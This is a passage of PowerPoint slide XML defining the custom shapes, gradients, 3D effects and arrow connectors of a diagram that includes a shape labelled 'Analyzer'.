                <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825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77648" h="825038">
                  <a:moveTo>
                    <a:pt x="42588" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="506602" y="2"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="740755" y="2"/>
                    <a:pt x="1277648" y="184693"/>
                    <a:pt x="1277648" y="412520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1277648" y="640347"/>
                    <a:pt x="740755" y="825038"/>
                    <a:pt x="506602" y="825038"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42585" y="825036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-10810" y="550025"/>
                    <a:pt x="-17482" y="248315"/>
                    <a:pt x="42588" y="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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="51000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="32000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3124930" y="3941265"/>
              <a:ext cx="480561" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30034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glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889707"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:pattFill prst="narVert">
              <a:fgClr>
                <a:schemeClr val="tx1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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889706"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="94000">
                  <a:srgbClr val="1D1D1D">
                    <a:alpha val="16000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="5000">
                  <a:srgbClr val="131313">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="262626"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                    <a:alpha val="93000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1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2960628" y="3197416"/>
              <a:ext cx="809164" cy="33019"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24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24799" h="24102">
                  <a:moveTo>
                    <a:pt x="0" y="24102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140163" y="7416"/>
                    <a:pt x="266842" y="0"/>
                    <a:pt x="404308" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541774" y="0"/>
                    <a:pt x="824799" y="24102"/>
                    <a:pt x="824799" y="24102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w="139700" prst="cross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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3194770" y="3941265"/>
              <a:ext cx="340880" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3003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/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="19000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="27000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="23000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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3235719" y="4159332"/>
              <a:ext cx="258982" cy="601579"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29055"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="0"/>
            </a:effectLst>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="76200" contourW="38100">
              <a:bevelT w="139700" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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3256981" y="4215675"/>
              <a:ext cx="216458" cy="260072"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 26999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50800" h="139700" prst="divot"/>
              <a:extrusionClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:extrusionClr>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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66051" y="1468555"/>
              <a:ext cx="2198318" cy="227805"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1895298" y="2958353"/>
            <a:ext cx="1746601" cy="1143001"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="8CBDE7"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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>
            <a:off x="1915688" y="3334871"/>
            <a:ext cx="1690765" cy="1139097"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="85725">
            <a:solidFill>
              <a:srgbClr val="8CBDE7"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln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1151087" y="3334871"/>
            <a:ext cx="1982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Analyzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3459001" y="4608597"/>
            <a:ext cx="1122431" cy="1879830"/>
            <a:chOff x="2266051" y="1450709"/>
            <a:chExt cx="2198318" cy="3681709"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2266051" y="1468556"/>
              <a:ext cx="2198318" cy="366386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rapezoid 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2582053" y="1450709"/>
              <a:ext cx="1566316" cy="1686284"/>
            </a:xfrm>
            <a:prstGeom prst="trapezoid">
              <a:avLst>
                <a:gd name="adj" fmla="val 23881"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="74000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="41000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="74000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="39000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="67000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="61000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="67000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="50000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="92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ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:softEdge rad="139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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2731399" y="3125209"/>
              <a:ext cx="1267622" cy="825036"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825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7622" h="825036">
                  <a:moveTo>
                    <a:pt x="72605" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496576" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="730729" y="0"/>
                    <a:pt x="1267622" y="184691"/>
                    <a:pt x="1267622" y="412518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1267622" y="640345"/>
                    <a:pt x="730729" y="825036"/>
                    <a:pt x="496576" y="825036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72605" y="825035"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-20837" y="550023"/>
                    <a:pt x="-27511" y="248315"/>
                    <a:pt x="7260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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
